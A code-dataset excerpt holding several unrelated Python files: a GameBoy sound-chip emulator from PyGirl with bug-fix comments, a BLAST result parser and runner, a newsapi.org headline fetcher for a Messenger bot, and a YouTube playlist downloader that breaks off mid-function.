content stringlengths 5 1.05M |
|---|
"""
PyGirl Emulator
Audio Processor Unit (Sharp LR35902 APU)
There are two sound channels connected to the output
terminals SO1 and SO2. There is also a input terminal Vin
connected to the cartridge. It can be routed to either of
both output terminals. GameBoy circuitry allows producing
sound in four different ways:
Quadrangular wave patterns with sweep and envelope functions.
Quadrangular wave patterns with envelope functions.
Voluntary wave patterns from wave RAM.
White noise with an envelope function.
These four sounds can be controlled independently and
then mixed separately for each of the output terminals.
Sound registers may be set at all times while producing
sound.
When setting the initial value of the envelope and
restarting the length counter, set the initial flag to 1
and initialize the data.
Under the following situations the Sound ON flag is
reset and the sound output stops:
1. When the sound output is stopped by the length counter.
2. When overflow occurs at the addition mode while sweep
is operating at sound 1.
When the Sound OFF flag for sound 3 (bit 7 of NR30) is
set at 0, the cancellation of the OFF mode must be done
by setting the sound OFF flag to 1. By initializing
sound 3, it starts its function.
When the All Sound OFF flag (bit 7 of NR52) is set to 0,
the mode registers for sounds 1,2,3, and 4 are reset and
the sound output stops. (NOTE: The setting of each sounds
mode register must be done after the All Sound OFF mode
is cancelled. During the All Sound OFF mode, each sound
mode register cannot be set.)
NOTE: DURING THE ALL SOUND OFF MODE, GB POWER CONSUMPTION
DROPS BY 16% OR MORE! WHILE YOUR PROGRAMS AREN'T USING
SOUND THEN SET THE ALL SOUND OFF FLAG TO 0. IT DEFAULTS
TO 1 ON RESET.
These tend to be the two most important equations in
converting between Hertz and GB frequency registers:
(Sounds will have a 2.4% higher frequency on Super GB.)
gb = 2048 - (131072 / Hz)
Hz = 131072 / (2048 - gb)
"""
from pypy.lang.gameboy.constants import *
from pypy.lang.gameboy.ram import iMemory
class Channel(object):
    """Base class for one APU sound channel.

    Subclasses override the update_* hooks and mix_audio to implement a
    concrete waveform.  The accessors mirror the GameBoy NRxx sound
    registers; `enabled` tracks whether the channel currently produces
    output.
    """
    # Class-level defaults (kept in the original RPython pre-declaration style).
    index = 0
    length = 0
    frequency = 0

    def __init__(self, sample_rate, frequency_table):
        # FIX: the original assigned self.length and self.frequency twice;
        # the duplicates were dead stores and have been removed.
        self.sample_rate = int(sample_rate)
        self.frequency_table = frequency_table
        self.length = 0
        self.envelope = 0
        self.frequency = 0
        self.playback = 0
        self.index = 0
        self.enabled = False

    def reset(self):
        """Restore the power-on register values for this channel."""
        self.index = 0
        self.set_length(0xFF)
        self.set_playback(0xBF)

    def update_audio(self):
        """Advance the channel by one sound-clock tick via the three hooks."""
        self.update_enabled()
        self.update_envelope_and_volume()
        self.update_frequency_and_playback()

    def update_enabled(self):
        pass

    def update_envelope_and_volume(self):
        pass

    def update_frequency_and_playback(self):
        pass

    def get_length(self):
        return self.length

    def set_length(self, length):
        self.length = length

    def get_envelope(self):
        return self.envelope

    def get_frequency(self):
        return self.frequency

    def get_playback(self):
        return self.playback

    def set_playback(self, playback):
        self.playback = playback

    def mix_audio(self, buffer, length, output_terminal):
        """Mix this channel's samples into *buffer*; overridden by subclasses."""
        pass
# ------------------------------------------------------------------------------
#SquareWaveGenerator
class SquareWaveChannel(Channel):
    """Audio channels 1 and 2: square wave with a volume envelope.

    Channel 1 additionally uses the frequency sweep (NR10); channel 2's
    sweep register is simply never written by the register map.

    NOTE(review): this is Python-2-era PyPy code; '/' on ints is floor
    division there and is deliberately left unchanged.
    """

    def __init__(self, sample_rate, frequency_table):
        Channel.__init__(self, sample_rate, frequency_table)
        self.sample_sweep = 0
        self.raw_sample_sweep = 0
        self.index = 0
        self.length = 0
        self.raw_length = 0
        self.volume = 0
        self.envelope_length = 0
        self.sample_sweep_length = 0
        self.frequency = 0
        self.raw_frequency = 0

    def reset(self):
        Channel.reset(self)
        self.set_sweep(0x80)
        self.set_length(0x3F)
        self.set_envelope(0x00)
        self.set_frequency(0xFF)

    def get_sweep(self):
        return self.raw_sample_sweep

    def set_sweep(self, data):
        # NR10: bits 4-6 hold the sweep period.
        self.raw_sample_sweep = data
        # BUG FIX: originally computed from self.sample_sweep, which is set
        # once to 0 in __init__ and never updated, so the sweep timer was
        # always reloaded with 0 here.
        self.sample_sweep_length = (SOUND_CLOCK / 128) * \
                                   ((self.raw_sample_sweep >> 4) & 0x07)

    def get_length(self):
        # Returns the raw NR11 register value, not the derived tick count.
        return self.raw_length

    def set_length(self, data):
        # NR11: bits 0-5 are the (inverted) length; counter runs at 256 Hz.
        self.raw_length = data
        self.length = (SOUND_CLOCK / 256) * (64 - (self.raw_length & 0x3F))

    def set_envelope(self, data):
        # NR12.  The +1/+2 volume adjustments below appear to emulate the
        # hardware's "zombie mode" envelope quirk — confirm against Pan Docs.
        self.envelope = data
        if (self.playback & 0x40) != 0:
            return
        if (self.envelope >> 4) == 0:
            self.volume = 0
        elif self.envelope_length == 0 and (self.envelope & 0x07) == 0:
            self.volume = (self.volume + 1) & 0x0F
        else:
            self.volume = (self.volume + 2) & 0x0F

    def set_frequency(self, data):
        # NR13: low 8 bits of the 11-bit period; high bits come from NR14.
        self.raw_frequency = data
        index = self.raw_frequency + ((self.playback & 0x07) << 8)
        self.frequency = self.frequency_table[index]

    def set_playback(self, data):
        # NR14: trigger (bit 7), length enable (bit 6), period high bits (0-2).
        self.playback = data
        index = self.raw_frequency + ((self.playback & 0x07) << 8)
        self.frequency = self.frequency_table[index]
        if (self.playback & 0x80) != 0:
            self.enabled = True
            if (self.playback & 0x40) != 0 and self.length == 0:
                # BUG FIX: reload from the stored raw register value; the
                # original used self.length (known to be 0 in this branch),
                # which always reloaded the full 64-step length.
                self.length = (SOUND_CLOCK / 256) * \
                              (64 - (self.raw_length & 0x3F))
            self.sample_sweep_length = (SOUND_CLOCK / 128) * \
                                       ((self.raw_sample_sweep >> 4) & 0x07)
            self.volume = self.envelope >> 4
            self.envelope_length = (SOUND_CLOCK / 64) * (self.envelope & 0x07)

    def update_enabled(self):
        # BUG FIX: renamed from update_enable so the hook dispatched by
        # Channel.update_audio() actually reaches this override.
        if (self.playback & 0x40) != 0 and self.length > 0:
            self.length -= 1
            if self.length <= 0:
                self.enabled = False

    # Backward-compatible alias for the old (misspelled) hook name.
    update_enable = update_enabled

    def update_envelope_and_volume(self):
        # BUG FIX: renamed from update_volume_and_envelope to match the
        # Channel.update_audio() hook name, so envelopes actually advance.
        if self.envelope_length <= 0:
            return
        self.envelope_length -= 1
        if self.envelope_length <= 0:
            if (self.envelope & 0x08) != 0:
                if (self.volume < 15):
                    self.volume += 1
            elif self.volume > 0:
                self.volume -= 1
            self.envelope_length += (SOUND_CLOCK / 64) * (self.envelope & 0x07)

    # Backward-compatible alias for the old name.
    update_volume_and_envelope = update_envelope_and_volume

    def update_frequency_and_playback(self):
        if self.sample_sweep_length <= 0:
            return
        self.sample_sweep_length -= 1
        if self.sample_sweep_length > 0:
            return
        sweep_steps = (self.raw_sample_sweep & 0x07)
        if sweep_steps != 0:
            self.update_frequency(sweep_steps)
        # Reload the sweep timer from the NR10 period bits.
        self.sample_sweep_length += (SOUND_CLOCK / 128) * \
                                    ((self.raw_sample_sweep >> 4) & 0x07)

    def update_frequency(self, sweep_steps):
        # Apply one sweep step; bit 3 of NR10 selects subtraction/addition.
        frequency = ((self.playback & 0x07) << 8) + self.frequency
        if (self.raw_sample_sweep & 0x08) != 0:
            frequency -= frequency >> sweep_steps
        else:
            frequency += frequency >> sweep_steps
        if frequency < 2048:
            self.frequency = self.frequency_table[frequency]
            self.raw_frequency = frequency & 0xFF
            self.playback = (self.playback & 0xF8) + \
                            ((frequency >> 8) & 0x07)
        else:
            # Overflow in addition mode silences the channel (see module doc).
            self.frequency = 0
            self.enabled = False
            #self.output_enable &= ~0x01

    def mix_audio(self, buffer, length, output_terminal):
        # NOTE(review): the duty-cycle comparison is commented out, so the
        # volume is currently subtracted unconditionally; the stride of 3
        # also differs from the other channels' stride of 2 — confirm intent.
        wave_pattern = self.get_current_wave_pattern()
        for index in range(0, length, 3):
            self.index += self.frequency
            # if (self.index & (0x1F << 22)) >= wave_pattern:
            # output_terminal & 0x20 for the second SquareWaveChannel
            if (output_terminal & 0x10) != 0:
                buffer[index + 0] -= self.volume
            if (output_terminal & 0x01) != 0:
                buffer[index + 1] -= self.volume

    def get_current_wave_pattern(self):
        # Duty cycle from bits 6-7 of NR11: 12.5%, 25%, 50% or 75%.
        wave_pattern = 0x18
        if (self.raw_length & 0xC0) == 0x00:
            wave_pattern = 0x04
        elif (self.raw_length & 0xC0) == 0x40:
            wave_pattern = 0x08
        elif (self.raw_length & 0xC0) == 0x80:
            wave_pattern = 0x10
        return wave_pattern << 22
# ---------------------------------------------------------------------------
class VoluntaryWaveChannel(Channel):
    """Audio channel 3: plays 4-bit samples from the 16-byte wave RAM.

    NOTE(review): Python-2-era PyPy code; '/' on ints is floor division
    there and is deliberately left unchanged.
    """

    def __init__(self, sample_rate, frequency_table):
        Channel.__init__(self, sample_rate, frequency_table)
        self.enable = 0
        self.level = 0
        self.index = 0
        self.length = 0
        self.raw_length = 0
        self.frequency = 0
        self.raw_frequency = 0
        # 16 bytes holding 32 packed 4-bit samples.
        self.wave_pattern = [0] * 16

    def reset(self):
        Channel.reset(self)
        self.set_enable(0x7F)
        self.set_length(0xFF)
        self.set_level(0x9F)
        self.set_frequency(0xFF)
        self.set_playback(0xBF)

    def get_enable(self):
        return self.enable

    def set_enable(self, data):
        # NR30: only bit 7 (channel master on/off) is stored.
        self.enable = data & 0x80
        if (self.enable & 0x80) == 0:
            self.enabled = False

    def get_level(self):
        return self.level

    def set_level(self, data):
        # NR32: output level; bits 5-6 select the volume shift.
        self.level = data

    def get_length(self):
        return self.raw_length

    def set_length(self, data):
        # NR31: full 8-bit length counter, clocked at 256 Hz.
        self.raw_length = data
        self.length = (SOUND_CLOCK / 256) * (256 - self.raw_length)

    def get_frequency(self):
        return self.raw_frequency

    def set_frequency(self, data):
        # NR33: low byte of the 11-bit period; channel 3 runs at half rate.
        self.raw_frequency = data
        index = ((self.playback & 0x07) << 8) + self.raw_frequency
        self.frequency = self.frequency_table[index] >> 1

    def set_playback(self, data):
        # NR34: trigger (bit 7), length enable (bit 6), period high bits (0-2).
        self.playback = data
        index = ((self.playback & 0x07) << 8) + self.raw_frequency
        self.frequency = self.frequency_table[index] >> 1
        if (self.playback & 0x80) != 0 and (self.enable & 0x80) != 0:
            self.enabled = True
            if (self.playback & 0x40) != 0 and self.length == 0:
                self.length = (SOUND_CLOCK / 256) * (256 - self.raw_length)

    def set_wave_pattern(self, address, data):
        self.wave_pattern[address & 0x0F] = data

    def get_wave_pattern(self, address):
        return self.wave_pattern[address & 0x0F] & 0xFF

    def update_audio(self):
        # Length counter only; channel 3 has no envelope or sweep.
        if (self.playback & 0x40) != 0 and self.length > 0:
            self.length -= 1
            # BUG FIX: the original assigned 'self.enabled = self.length <= 0',
            # which silenced the channel while playing and enabled it on
            # expiry — inverted relative to channel 1's length handling.
            if self.length <= 0:
                self.enabled = False
                #self.output_enable &= ~0x04

    def mix_audio(self, buffer, length, output_terminal):
        wave_pattern = self.get_current_wave_pattern()
        for index in range(0, length, 2):
            self.index += self.frequency
            # Select the current wave-RAM byte, then its high or low nibble.
            sample = self.wave_pattern[(self.index >> 23) & 0x0F]
            if ((self.index & (1 << 22)) != 0):
                sample = (sample >> 0) & 0x0F
            else:
                sample = (sample >> 4) & 0x0F
            # Center around zero and apply the NR32 volume shift.
            # NOTE(review): shifting by self.level (the raw register) rather
            # than the decoded 0-3 shift amount looks suspicious — confirm.
            sample = int(((sample - 8) << 1) >> self.level)
            if (output_terminal & 0x40) != 0:
                buffer[index + 0] += sample
            if (output_terminal & 0x04) != 0:
                buffer[index + 1] += sample

    def get_current_wave_pattern(self):
        # Decode NR32 bits 5-6 into the mixer's pattern constant.
        wave_pattern = 2
        if (self.level & 0x60) == 0x00:
            wave_pattern = 8
        elif (self.level & 0x60) == 0x20:
            wave_pattern = 0
        elif (self.level & 0x60) == 0x40:
            wave_pattern = 1
        return wave_pattern << 22
# ---------------------------------------------------------------------------
class NoiseGenerator(Channel):
    """Audio channel 4: LFSR white noise with a volume envelope.

    NOTE(review): Python-2-era PyPy code; '/' on ints is floor division
    there and is deliberately left unchanged.
    """

    def __init__(self, sample_rate, frequency_table):
        Channel.__init__(self, sample_rate, frequency_table)
        self.length = 0
        self.polynomial = 0
        self.index = 0
        self.raw_length = 0
        self.volume = 0
        self.envelope_length = 0
        self.frequency = 0
        self.generate_noise_frequency_ratio_table()
        self.generate_noise_tables()

    def reset(self):
        Channel.reset(self)
        self.set_length(0xFF)
        self.set_envelope(0x00)
        self.set_polynomial(0x00)
        self.set_playback(0xBF)

    def generate_noise_frequency_ratio_table(self):
        # Polynomial noise frequency ratios:
        # 4194304 Hz * 1/2^3 * {2, 1, 1/2, 1/3, 1/4, 1/5, 1/6, 1/7}
        self.noiseFreqRatioTable = [0] * 8
        sampleFactor = ((1 << 16) / self.sample_rate)
        self.noiseFreqRatioTable[0] = GAMEBOY_CLOCK * sampleFactor
        for ratio in range(1, 8):
            divider = 2 * ratio
            self.noiseFreqRatioTable[ratio] = (GAMEBOY_CLOCK / divider) * \
                                              sampleFactor

    def generate_noise_tables(self):
        self.create_7_step_noise_table()
        self.create_15_step_noise_table()

    def create_7_step_noise_table(self):
        # Precompute the 7-bit LFSR sequence, packed 32 bits per list entry.
        self.noise_step_7_table = [0] * 4
        polynomial = 0x7F
        for index in range(0, 0x7F):
            polynomial = (((polynomial << 6) ^ (polynomial << 5)) & 0x40) | \
                         (polynomial >> 1)
            if (index & 0x1F) == 0:
                self.noise_step_7_table[index >> 5] = 0
            self.noise_step_7_table[index >> 5] |= (polynomial & 0x01) << \
                                                   (index & 0x1F)

    def create_15_step_noise_table(self):
        # Precompute the 15-bit LFSR sequence, packed 32 bits per list entry.
        self.noise_step_15_table = [0] * 1024
        polynomial = 0x7FFF
        for index in range(0, 0x7FFF):
            polynomial = (((polynomial << 14) ^ (polynomial << 13)) & \
                          0x4000) | (polynomial >> 1)
            if (index & 0x1F) == 0:
                self.noise_step_15_table[index >> 5] = 0
            self.noise_step_15_table[index >> 5] |= (polynomial & 0x01) << \
                                                    (index & 0x1F)

    def get_length(self):
        return self.raw_length

    def set_length(self, data):
        self.raw_length = data
        # BUG FIX: derive the tick count from the stored register value; the
        # original read the stale self.length instead of raw_length (the
        # square-wave channels use raw_length in the same formula).
        self.length = (SOUND_CLOCK / 256) * (64 - (self.raw_length & 0x3F))

    def set_envelope(self, data):
        # NR42; see SquareWaveChannel.set_envelope for the same volume quirk.
        self.envelope = data
        # BUG FIX: was 'is not 0' — an identity comparison on an int; use !=.
        if (self.playback & 0x40) != 0:
            return
        if (self.envelope >> 4) == 0:
            self.volume = 0
        elif self.envelope_length == 0 and (self.envelope & 0x07) == 0:
            self.volume = (self.volume + 1) & 0x0F
        else:
            self.volume = (self.volume + 2) & 0x0F

    def get_polynomial(self):
        return self.polynomial

    def set_polynomial(self, data):
        # NR43: shift clock frequency (bits 4-7), dividing ratio (bits 0-2).
        self.polynomial = data
        if (self.polynomial >> 4) <= 12:
            freq = self.noiseFreqRatioTable[self.polynomial & 0x07]
            self.frequency = freq >> ((self.polynomial >> 4) + 1)
        else:
            self.frequency = 0

    def get_playback(self):
        return self.playback

    def set_playback(self, data):
        # NR44: trigger (bit 7) and length enable (bit 6).
        self.playback = data
        if (self.playback & 0x80) == 0:
            return
        self.enabled = True
        if (self.playback & 0x40) != 0 and self.length == 0:
            # BUG FIX: reload from raw_length (self.length is 0 here, so the
            # original always reloaded the full 64-step length).
            self.length = (SOUND_CLOCK / 256) * (64 - (self.raw_length & 0x3F))
        self.volume = self.envelope >> 4
        self.envelope_length = (SOUND_CLOCK / 64) * (self.envelope & 0x07)
        self.index = 0

    def update_enabled(self):
        if (self.playback & 0x40) != 0 and self.length > 0:
            self.length -= 1
            # BUG FIX: was 'self.enabled = self.length <= 0' (inverted); the
            # channel must switch OFF when the length counter expires.
            if self.length <= 0:
                self.enabled = False
                #self.output_enable &= ~0x08

    def update_envelope_and_volume(self):
        if self.envelope_length <= 0:
            return
        self.envelope_length -= 1
        if self.envelope_length > 0:
            return
        if (self.envelope & 0x08) != 0:
            if self.volume < 15:
                self.volume += 1
        elif self.volume > 0:
            self.volume -= 1
        self.envelope_length += (SOUND_CLOCK / 64) * (self.envelope & 0x07)

    def mix_audio(self, buffer, length, output_terminal):
        for index in range(0, length, 2):
            self.index += self.frequency
            if (self.polynomial & 0x08) != 0:
                # 7-step LFSR
                self.index &= 0x7FFFFF
                polynomial = self.noise_step_7_table[self.index >> 21] >> \
                             ((self.index >> 16) & 0x1F)
            else:
                # 15-step LFSR
                self.index &= 0x7FFFFFFF
                polynomial = self.noise_step_15_table[self.index >> 21] >> \
                             ((self.index >> 16) & 0x1F)
            if (polynomial & 1) != 0:
                if (output_terminal & 0x80) != 0:
                    buffer[index + 0] -= self.volume
                if (output_terminal & 0x08) != 0:
                    buffer[index + 1] -= self.volume
            else:
                if (output_terminal & 0x80) != 0:
                    buffer[index + 0] += self.volume
                if (output_terminal & 0x08) != 0:
                    buffer[index + 1] += self.volume
# ------------------------------------------------------------------------------
class Sound(iMemory):
    """Top-level APU: owns the four channels and maps the NRxx registers.

    NOTE(review): Python-2-era PyPy code; '/' on ints is floor division
    there — do not "modernize" to true division.
    """

    def __init__(self, sound_driver):
        self.buffer = [0] * 512
        self.outputLevel = 0
        self.output_terminal = 0
        self.output_enable = 0
        self.driver = sound_driver
        self.sample_rate = self.driver.get_sample_rate()
        self.generate_frequency_table()
        self.create_channels()
        self.reset()

    def create_channels(self):
        # Channels 1 and 2 share the square-wave implementation; only
        # channel 1's sweep register is wired up by read()/write().
        self.channel1 = SquareWaveChannel(self.sample_rate, self.frequency_table)
        self.channel2 = SquareWaveChannel(self.sample_rate, self.frequency_table)
        self.channel3 = VoluntaryWaveChannel(self.sample_rate, self.frequency_table)
        self.channel4 = NoiseGenerator(self.sample_rate, self.frequency_table)
        self.channels = [self.channel1, self.channel2, self.channel3, self.channel4]

    def generate_frequency_table(self):
        """Precompute per-period mixer skip values.

        frequency = (4194304 / 32) / (2048 - period) Hz; entries that would
        overrun the 32-sample wave window are clamped to 0.
        """
        self.frequency_table = [0] * 2048
        for period in range(0, 2048):
            skip = (((GAMEBOY_CLOCK << 10) / \
                   self.sample_rate) << 16) / (2048 - period)
            if skip >= (32 << 22):
                self.frequency_table[period] = 0
            else:
                self.frequency_table[period] = skip

    def reset(self):
        self.cycles = int(GAMEBOY_CLOCK / SOUND_CLOCK)
        self.frames = 0
        self.channel1.reset()
        self.channel2.reset()
        self.channel3.reset()
        self.channel4.reset()
        self.set_output_level(0x00)
        self.set_output_terminal(0xF0)
        self.set_output_enable(0xFF)
        # Initialize wave RAM (0xFF30-0xFF3F) with the alternating power-on
        # pattern.  BUG FIX: the original range stopped at 0xFF3E and left
        # the last wave-RAM byte uninitialized.
        for address in range(0xFF30, 0xFF40):
            write = 0xFF
            if (address & 1) == 0:
                write = 0x00
            self.write(address, write)

    def start(self):
        self.driver.start()

    def stop(self):
        self.driver.stop()

    def get_cycles(self):
        return self.cycles

    def emulate(self, ticks):
        """Consume *ticks* CPU cycles, stepping the APU at SOUND_CLOCK rate."""
        ticks = int(ticks)
        self.cycles -= ticks
        while (self.cycles <= 0):
            self.update_audio()
            if self.driver.is_enabled():
                self.mix_down_audio()
            self.cycles += GAMEBOY_CLOCK / SOUND_CLOCK

    def mix_down_audio(self):
        # Accumulate fractional frames so the sample rate need not divide
        # SOUND_CLOCK evenly; length is doubled for stereo interleaving.
        self.frames += self.driver.get_sample_rate()
        length = (self.frames / SOUND_CLOCK) << 1
        self.mix_audio(self.buffer, length)
        self.driver.write(self.buffer, length)
        self.frames %= SOUND_CLOCK

    def read(self, address):
        """Dispatch a sound-register read; unmapped addresses return 0xFF."""
        # TODO map the read/write in groups directly to the channels
        address = int(address)
        if address == NR10:
            return self.channel1.get_sweep()
        elif address == NR11:
            return self.channel1.get_length()
        elif address == NR12:
            return self.channel1.get_envelope()
        elif address == NR13:
            return self.channel1.get_frequency()
        elif address == NR14:
            return self.channel1.get_playback()
        elif address == NR21:
            return self.channel2.get_length()
        elif address == NR22:
            return self.channel2.get_envelope()
        elif address == NR23:
            return self.channel2.get_frequency()
        elif address == NR24:
            return self.channel2.get_playback()
        elif address == NR30:
            return self.channel3.get_enable()
        elif address == NR31:
            return self.channel3.get_length()
        elif address == NR32:
            return self.channel3.get_level()
        elif address == NR33:
            # BUG FIX: the original returned channel4's frequency here;
            # NR33 is channel 3's frequency register.
            return self.channel3.get_frequency()
        elif address == NR34:
            return self.channel3.get_playback()
        elif address == NR41:
            return self.channel4.get_length()
        elif address == NR42:
            return self.channel4.get_envelope()
        elif address == NR43:
            return self.channel4.get_polynomial()
        elif address == NR44:
            return self.channel4.get_playback()
        elif address == NR50:
            return self.get_output_level()
        elif address == NR51:
            return self.get_output_terminal()
        elif address == NR52:
            return self.get_output_enable()
        elif address >= AUD3WAVERAM and address <= AUD3WAVERAM + 0x3F:
            # NOTE(review): wave RAM is 16 bytes; the 0x3F span relies on the
            # & 0x0F mask inside the channel — confirm the intended range.
            return self.channel3.get_wave_pattern(address)
        return 0xFF

    def write(self, address, data):
        """Dispatch a sound-register write; unmapped addresses are ignored."""
        address = int(address)
        if address == NR10:
            self.channel1.set_sweep(data)
        elif address == NR11:
            self.channel1.set_length(data)
        elif address == NR12:
            self.channel1.set_envelope(data)
        elif address == NR13:
            self.channel1.set_frequency(data)
        elif address == NR14:
            self.channel1.set_playback(data)
        elif address == NR21:
            self.channel2.set_length(data)
        elif address == NR22:
            self.channel2.set_envelope(data)
        elif address == NR23:
            self.channel2.set_frequency(data)
        elif address == NR24:
            self.channel2.set_playback(data)
        elif address == NR30:
            self.channel3.set_enable(data)
        elif address == NR31:
            self.channel3.set_length(data)
        elif address == NR32:
            self.channel3.set_level(data)
        elif address == NR33:
            self.channel3.set_frequency(data)
        elif address == NR34:
            self.channel3.set_playback(data)
        elif address == NR41:
            self.channel4.set_length(data)
        elif address == NR42:
            self.channel4.set_envelope(data)
        elif address == NR43:
            self.channel4.set_polynomial(data)
        elif address == NR44:
            self.channel4.set_playback(data)
        elif address == NR50:
            self.set_output_level(data)
        elif address == NR51:
            self.set_output_terminal(data)
        elif address == NR52:
            self.set_output_enable(data)
        elif address >= AUD3WAVERAM and address <= AUD3WAVERAM + 0x3F:
            self.channel3.set_wave_pattern(address, data)

    def update_audio(self):
        # All Sound OFF flag (bit 7 of NR52) gates every channel.
        if (self.output_enable & 0x80) != 0:
            for channel in self.channels:
                if channel.enabled:
                    channel.update_audio()

    def mix_audio(self, buffer, length):
        if (self.output_enable & 0x80) != 0:
            for channel in self.channels:
                if channel.enabled:
                    channel.mix_audio(buffer, length, self.output_terminal)

    # Output Control

    def get_output_level(self):
        return self.outputLevel

    def get_output_terminal(self):
        return self.output_terminal

    def get_output_enable(self):
        return self.output_enable

    def set_output_level(self, data):
        self.outputLevel = data

    def set_output_terminal(self, data):
        self.output_terminal = data

    def set_output_enable(self, data):
        # TODO map directly to the channels
        # Only bit 7 is writable; clearing it also clears the per-channel
        # status bits (low nibble).
        self.output_enable = (self.output_enable & 0x7F) | (data & 0x80)
        if (self.output_enable & 0x80) == 0x00:
            self.output_enable &= 0xF0
class BogusSound(iMemory):
    """
    No-op sound unit used for development purposes.
    """

    def __init__(self):
        pass

    def reset(self):
        pass

    def get_cycles(self):
        # BUG FIX: the original defined get_cycles twice; the first
        # definition (returning None) was dead code shadowed by this one.
        return 0xFF

    def emulate(self, ticks):
        pass
# SOUND DRIVER -----------------------------------------------------------------
class SoundDriver(object):
    """Base audio back-end: 44.1 kHz, stereo, 8-bit samples.

    Subclasses override start/stop/write to feed a real output device;
    this base implementation is a silent stub.
    """

    def __init__(self):
        # Fixed output format advertised to the Sound unit.
        self.enabled = True
        self.sample_rate = 44100
        self.channel_count = 2
        self.bits_per_sample = 8

    def start(self):
        pass

    def stop(self):
        pass

    def write(self, buffer, length):
        pass

    def is_enabled(self):
        return self.enabled

    def get_sample_rate(self):
        return self.sample_rate

    def get_channels(self):
        return self.channel_count

    def get_bits_per_sample(self):
        return self.bits_per_sample
|
from Bio.Blast.Applications import NcbiblastpCommandline, NcbiblastnCommandline, NcbimakeblastdbCommandline
class Blast:
    '''
    One parsed hit line of BLAST tabular output (legacy blast -m 8 /
    blast+ -outfmt 6): twelve tab-separated fields, one per attribute.
    '''

    def __init__(self, line, q, db):
        fields = line.split("\t")
        self.parsed = fields
        self.query = fields[0]
        self.subject = fields[1]
        self.percent = float(fields[2])
        self.alignment_length = int(fields[3])
        self.mismatches = int(fields[4])
        self.gap_openings = int(fields[5])
        self.query_start = int(fields[6])
        self.query_end = int(fields[7])
        self.subject_start = int(fields[8])
        self.subject_end = int(fields[9])
        self.eval = float(fields[10])
        self.bit_score = float(fields[11])
        self.query_file_path = q
        self.db_file_path = db

    def __str__(self):
        return "<JAKomics BLAST Class>"

    def view(self):
        # Compact summary of the hit for quick inspection.
        return [self.query, self.subject, self.percent, self.eval]

    def print_rough_result(self):
        print(self.query, self.subject, self.percent, self.eval, sep="\t")

    def print_full_result(self):
        print(f'{self.query} ({self.query_start}-{self.query_end}) hits {self.subject} ({self.subject_start}-{self.subject_end}) at {self.percent}% and {self.mismatches}/{self.gap_openings} mismatches/gaps (e-value: {self.eval}, score: {self.bit_score}).')

    def filter(self, e=10, b=1, p=35):
        # A hit passes only when all three thresholds are satisfied:
        # e-value at most e, bit score at least b, percent identity at least p.
        return (self.eval <= float(e)
                and self.bit_score >= float(b)
                and self.percent >= float(p))

    def result(self):
        return {'gene': self.query,
                'annotation': self.subject,
                'score': self.bit_score,
                'evalue': self.eval}
def test():
    # Smoke check: confirms this module was imported successfully.
    print("blast module loaded correctly")
def make_blast_db(type, db):
    """Build a BLAST database from the FASTA file *db*.

    type: BLAST dbtype string ('prot' or 'nucl').
    NOTE: *type* shadows the builtin; kept for interface compatibility.
    Requires the NCBI makeblastdb binary to be on PATH.
    """
    make_blast_db_cl = NcbimakeblastdbCommandline(
        dbtype=type,
        input_file=db)
    # Executing the commandline object runs makeblastdb.
    make_blast_db_cl()
def run_blast(type, q, db, threads=1, e=0.001, make=False, return_query_results=True, echo=False):
    '''Run blastp/blastn of query file *q* against database *db*.

    type = "prot" or "nucl" (selects blastp vs blastn).
    Returns a dict mapping query id (or subject id when
    return_query_results is False) to a list of Blast hit objects.
    Requires the corresponding BLAST+ binary on PATH.
    '''
    if make:
        make_blast_db(type, db)
    # NOTE(review): if *type* is neither "prot" nor "nucl", blast_type is
    # never bound and the construction below raises NameError.
    if type == 'prot':
        blast_type = NcbiblastpCommandline
    elif type == "nucl":
        blast_type = NcbiblastnCommandline
    blast_cline = blast_type(
        query=q,
        db=db,
        evalue=e,
        outfmt=6,
        num_threads=threads)
    if echo:
        print(blast_cline)
    # Running the commandline returns the tabular hits on stdout.
    stdout, stderr = blast_cline()
    raw_results = stdout.split("\n")
    if echo:
        print(stderr)
    results = {}
    if return_query_results:
        # Group hits by query sequence id.
        for line in [line.strip() for line in raw_results]:
            if len(line) > 0:
                hit = Blast(line, q, db)
                if hit.query in results:
                    results[hit.query].append(hit)
                else:
                    results[hit.query] = [hit]
    else:
        # Group hits by subject (database) sequence id.
        for line in [line.strip() for line in raw_results]:
            if len(line) > 0:
                hit = Blast(line, q, db)
                if hit.subject in results:
                    results[hit.subject].append(hit)
                else:
                    results[hit.subject] = [hit]
    return results
|
# Powered by https://newsapi.org
# Import essentials
import requests
import json
import os
from pymessenger.bot import Bot
from pymessenger import Element
# Definitons
class getNewsHeadlines:
    # Skill that fetches top headlines for a news source via newsapi.org.
    # NOTE(review): class name is lowerCamelCase; presumably looked up by
    # this exact name by the surrounding framework — confirm before renaming.
    def __init__(self):
        # Entity key this skill consumes, and the key it produces.
        self.inp = 'news_sources'
        self.out = 'news'

    def do(self, entities):
        """Fetch up to five articles for entities['news_sources'].

        Requires the NEWSAPI_KEY environment variable; raises KeyError if
        it is unset.  Stores a ('Here's the news', [Element, ...]) tuple
        under entities['news'] and returns the mutated entities dict.
        """
        r = requests.get('https://newsapi.org/v1/articles', params={
            'source': entities['news_sources'], 'apiKey': os.environ['NEWSAPI_KEY']})
        data = json.loads(r.text)
        val = []
        # Build one messenger Element per article (first five only).
        for x in data['articles'][:5]:
            elem = Element(title=x['title'], subtitle=x['description'],
                           image_url=x['urlToImage'], item_url=x['url'])
            val.append(elem)
        entities['news'] = ('Here\'s the news', val)
        return entities
|
import json
from mcoding_youtube.app_config import config
from mcoding_youtube.youtube import paginated_results, get_authenticated_readonly_service
def dump_json_to_file(obj, filename):
    """Serialize *obj* as JSON text into *filename* (UTF-8)."""
    with open(filename, 'w', encoding='utf-8') as handle:
        handle.write(json.dumps(obj))
def get_my_uploads_playlist_id(youtube):
    """Return the id of the authenticated user's 'uploads' playlist.

    Returns None when the response contains no channels.
    See https://developers.google.com/youtube/v3/docs/channels/list
    """
    response = youtube.channels().list(
        mine=True,
        part='contentDetails'
    ).execute()
    items = response['items']
    if not items:
        return None
    # Only the first channel's uploads playlist is relevant.
    return items[0]['contentDetails']['relatedPlaylists']['uploads']
def download_playlist_video_snippets(youtube, playlist_id, file_prefix):
    """Dump every page of a playlist's item snippets to JSON files.

    One file per API page (50 items each), named
    '{file_prefix}{page_no}.json'.
    See https://developers.google.com/youtube/v3/docs/playlistItems/list
    """
    playlistitems_list_request = youtube.playlistItems().list(
        playlistId=playlist_id,
        part='snippet',
        maxResults=50
    )
    # paginated_results follows nextPageToken links and yields each page.
    results = paginated_results(youtube.playlistItems(), playlistitems_list_request)
    for page_no, playlistitems_list_response in enumerate(results):
